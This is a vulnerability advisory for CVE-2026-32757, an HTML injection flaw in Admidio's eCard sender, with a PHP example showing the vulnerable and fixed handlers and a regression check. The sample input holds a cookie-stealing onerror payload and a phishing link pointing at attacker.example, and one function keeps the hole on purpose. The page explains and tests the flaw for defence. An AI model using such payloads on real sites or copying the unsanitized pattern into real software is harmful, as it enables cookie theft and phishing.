HTML Injection Vulnerability in Admidio User Management Solution
CVE-2026-32757

CVSS 5.4 (MEDIUM)

Key Information:

Vendor: Admidio
Status: Vendor
CVE Published: 19 March 2026

What is CVE-2026-32757?

Admidio is an open-source user management solution. In versions 5.0.6 and earlier, the eCard send handler builds the greeting-card HTML from the raw $_POST['ecard_message'] value instead of from the copy that has been passed through the server-side HTMLPurifier sanitization: the sanitized message is computed, but it is not the value that ends up in the card. Any authenticated member who can send an eCard can therefore place arbitrary HTML, including script, into the card, and the card is then emailed by the Admidio installation to the chosen recipients. Because the message arrives from a trusted sender, the injected content is a ready-made vehicle for phishing (spoofed notices, links to credential-harvesting pages). Most mail clients do not execute script, so in the email channel the practical impact is content and markup injection rather than script execution. The issue is fixed in version 5.0.7.
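As an added illustration (not Admidio's code), the stand-alone PHP below shows the bug class described above: a sanitized copy of the message is computed but the raw request value is the one interpolated into the card markup, shown next to the corrected wiring, together with a regression check that parses the rendered card for active content. The function names, the card markup and the attacker input are constructed for this example; the HTMLPurifier calls are that library's real API and are only used when the class is available, otherwise the example falls back to escaping everything so it still runs offline.

```php
<?php
// Added illustration of the bug class in CVE-2026-32757; this is not Admidio's
// code. Function names, the template markup and the sample input are constructed
// for the example. Requires PHP 8 with the dom extension; HTMLPurifier
// (composer package ezyang/htmlpurifier) is used when it is installed.
declare(strict_types=1);

// Server-side sanitizer. With HTMLPurifier installed this is the real purify()
// call; otherwise everything is escaped so the example runs without dependencies.
function sanitizeCardMessage(string $raw): string
{
    if (class_exists('HTMLPurifier')) {
        $purifier = new HTMLPurifier(HTMLPurifier_Config::createDefault());
        return $purifier->purify($raw);
    }
    return htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Vulnerable pattern: the handler computes a sanitized copy of the message,
// then builds the card from the untouched request value anyway. $post stands
// in for $_POST so the function can be exercised from the command line.
function buildCardVulnerable(array $post): string
{
    $message = sanitizeCardMessage($post['ecard_message'] ?? '');
    return '<div class="ecard">' . ($post['ecard_message'] ?? '') . '</div>';
}

// Fixed pattern: only the sanitized variable ever reaches the template.
function buildCardFixed(array $post): string
{
    $message = sanitizeCardMessage($post['ecard_message'] ?? '');
    return '<div class="ecard">' . $message . '</div>';
}

// Regression check on the rendered card: parse the HTML and look for script
// elements, on* event-handler attributes and javascript: URLs. Escaped text
// produces no elements at all, so it passes; a purifier that keeps harmless
// tags (links, images) but drops handlers passes too.
function containsActiveContent(string $html): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    if ($doc->getElementsByTagName('script')->length > 0) {
        return true;
    }
    foreach ((new DOMXPath($doc))->query('//@*') as $attr) {
        $name = strtolower($attr->nodeName);
        if (str_starts_with($name, 'on')) {
            return true;
        }
        if (in_array($name, ['href', 'src'], true)
            && str_starts_with(strtolower(ltrim($attr->nodeValue)), 'javascript:')) {
            return true;
        }
    }
    return false;
}

// Constructed attacker input: an event handler that exfiltrates cookies plus a
// phishing link, both wrapped in an innocuous greeting.
$post = [
    'ecard_message' => 'Happy birthday! <img src="x" onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">'
        . ' Your membership lapses today, <a href="https://attacker.example/renew">renew here</a>.',
];

var_dump(containsActiveContent(buildCardVulnerable($post)));
var_dump(containsActiveContent(buildCardFixed($post)));
```

Run it with the php command-line interpreter: the vulnerable builder trips the check because the raw img element with its onerror handler survives, while the fixed builder does not, whichever sanitizer did the work. The check parses the markup rather than pattern-matching the string, because an escaped message still contains the literal text onerror= and a regex would report a false positive. Note also that HTMLPurifier's default policy keeps the phishing link itself, since ordinary http and https links are allowed HTML: sanitization removes active content, not misleading text, so the phishing angle the advisory describes is only partly mitigated by the purifier even when it is applied correctly.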

Affected Version(s)

admidio < 5.0.7


CVSS v3.1

Score: 5.4
Severity: MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Timeline

  • Vulnerability published: 19 March 2026

  • Vulnerability reserved